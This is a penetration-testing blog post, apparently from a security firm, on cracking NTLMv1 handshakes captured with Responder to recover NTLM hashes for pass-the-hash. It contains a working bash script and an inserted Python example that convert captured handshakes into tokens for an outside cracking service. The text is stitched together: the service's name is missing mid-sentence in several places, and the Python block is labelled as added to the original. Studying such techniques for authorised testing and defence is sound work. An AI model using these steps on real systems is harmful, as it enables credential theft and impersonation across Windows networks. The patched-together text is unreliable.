Cracking NTLMv1 Handshakes with

Read on if you’d like to learn how to crack NTLMv1 handshakes with the service to obtain the NTLM hash. Publicized since 2013, this technique is not often leveraged by testers.

Running is one of the first tasks performed by most pentesters on internal penetration tests. The tool spoofs multicast name resolution queries and hands the pentester NTLMv1 and NTLMv2 handshakes. Usually the next step is to try to crack those handshakes, at a minimum by running them against a wordlist such as crackstation.

An NTLMv1 handshake, however, offers another, usually ignored, cracking option that is guaranteed to yield the NTLM hash. Unlike the NTLMv1 handshake itself, the NTLM hash can be used as a password equivalent in a Windows environment.

Required Reading

MS-CHAPv2 handshakes can be broken into two rounds of 56-bit DES (plus a third round that uses only 2 bytes of the keyspace), which Moxie demonstrated could be cracked with modern FPGAs.

NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness.

How do we exploit this?

Use the site to extract the NTLM hash from any MS-CHAPv2 or NTLMv1 handshake for $20. The site does not accept the raw challenge/response pair, so you need to convert what Responder displays into a token rather than submitting it directly.

Use the script below to convert the Responder output to a token that will be accepted by



#!/bin/bash

if [ $# -lt 1 ]; then
    echo "Usage: $0 <hash_file> <hash_file2> ..."
    exit 1
fi

for i in "$@"; do
  for hash in $( cat "$i" ); do
    # Responder NTLMv1 line format: user::domain:lmresp:ntresp:challenge
    user=$(echo "$hash" | cut -f1 -d:)
    domain=$(echo "$hash" | cut -f3 -d:)
    lmresp=$(echo "$hash" | cut -f4 -d:)
    ntresp=$(echo "$hash" | cut -f5 -d:)
    srvchallenge=$(echo "$hash" | cut -f6 -d:)

    # Secret sauce: NTLMv1 with Extended Session Security (ESS). The LM
    # response is then an 8-byte client challenge followed by 16 zero bytes,
    # and the NT response was computed over MD5(server challenge + client
    # challenge) truncated to 8 bytes, so that is the challenge to submit.
    if [ "${lmresp:16:32}" == "00000000000000000000000000000000" ]; then
        combinedchallenge="${srvchallenge}${lmresp:0:16}"
        srvchallenge=$( echo "$combinedchallenge" | xxd -r -p | md5sum -b | cut -c1-16)
    fi

    echo "user:$user"
    echo "domain:$domain"
    echo "lmresponse:$lmresp"
    echo "ntresp:$ntresp"
    echo "challenge:$srvchallenge"

    # Build the token with chapcrack's radius mode (script name assumed to be chapcrack.py)
    chapcrack=$(locate chapcrack.py | head -1)
    if [ -e "$chapcrack" ]; then
        $chapcrack radius -R "$ntresp" -C "$srvchallenge"
    else
        # chapcrack not found: print the command to run by hand
        echo "chapcrack.py radius -R $ntresp -C $srvchallenge"
    fi
  done
done




Upload this token to, give them 20 dollars, and wait for your NTLM hash.
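To make the script's secret sauce and the DES structure behind it concrete, here is an added Python example that is not part of the original post: it parses a Responder-style NTLMv1 line, derives the challenge the NT response was really computed over (handling the ESS case), and shows how a 16-byte NT hash splits into the three DES keys, two of 56 bits and one of only 16. The sample line is constructed, and the NT hash used is the MS-NLMP test-vector hash for the password "Password".

```python
import hashlib

def parse_responder_ntlmv1(line):
    """Split one Responder NTLMv1 line: user::domain:lmresp:ntresp:challenge (hex)."""
    parts = line.strip().split(":")
    if len(parts) != 6:
        raise ValueError("expected user::domain:lmresp:ntresp:challenge")
    user, _, domain, lmresp, ntresp, challenge = parts
    if (len(lmresp), len(ntresp), len(challenge)) != (48, 48, 16):
        raise ValueError("LM/NT responses must be 24 bytes, challenge 8 bytes")
    return {"user": user, "domain": domain, "lmresp": lmresp.lower(),
            "ntresp": ntresp.lower(), "challenge": challenge.lower()}

def effective_challenge(lmresp, server_challenge):
    """Return the 8-byte value the NT response was actually DES-encrypted over.
    With Extended Session Security the LM field is an 8-byte client challenge
    plus 16 zero bytes, and the real challenge is MD5(server||client)[:8]."""
    if lmresp[16:] == "0" * 32:
        combined = bytes.fromhex(server_challenge + lmresp[:16])
        return hashlib.md5(combined).hexdigest()[:16]
    return server_challenge

def expand_des_key(key7):
    """Turn a 7-byte (56-bit) key into DES's 8-byte form with odd-parity bits."""
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        b = ((bits >> (49 - 7 * i)) & 0x7F) << 1
        if bin(b).count("1") % 2 == 0:
            b |= 1  # parity bit (LSB) makes the byte's bit count odd
        out.append(b)
    return bytes(out)

def des_keys_from_nt_hash(nt_hash_hex):
    """The three DES keys NTLMv1 derives from a 16-byte NT hash: 7 + 7 + 2 bytes,
    the last padded with five zero bytes. Keys 1 and 2 each span 2**56 values;
    key 3 only 2**16, which is why the third round is cheap to recover."""
    h = bytes.fromhex(nt_hash_hex) + b"\x00" * 5
    return [expand_des_key(h[i:i + 7]) for i in (0, 7, 14)]

# Constructed sample: a Responder-style NTLMv1-ESS line (not a real capture).
SAMPLE_LINE = ("alice::CORP:" + "aaaaaaaaaaaaaaaa" + "0" * 32 + ":"
               + "7537f803ae367128ca458204bde7caf81e97ed2683267232"
               + ":0123456789abcdef")

if __name__ == "__main__":
    rec = parse_responder_ntlmv1(SAMPLE_LINE)
    print("challenge to submit:", effective_challenge(rec["lmresp"], rec["challenge"]))
    # NT hash of "Password" from the MS-NLMP test vectors, to show the key split
    for n, k in enumerate(des_keys_from_nt_hash("a4f49c406510bdcab6824ee7c30fd852"), 1):
        print(f"DES key {n}: {k.hex()}")
```

The challenge printed for an ESS line is the one to pass to chapcrack with -C; for a non-ESS line it is simply the server challenge Responder recorded.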

Another Hash?

Yes, NTLM hashes are password equivalents in a Windows environment. To leverage your newly acquired NTLM hash, use a pass-the-hash tool such as wmi-pth.

All recommendations and case studies presented by Tevora are for information purposes only and not intended to be for the purposes of providing information security advice. Any use of this information for other means is prohibited.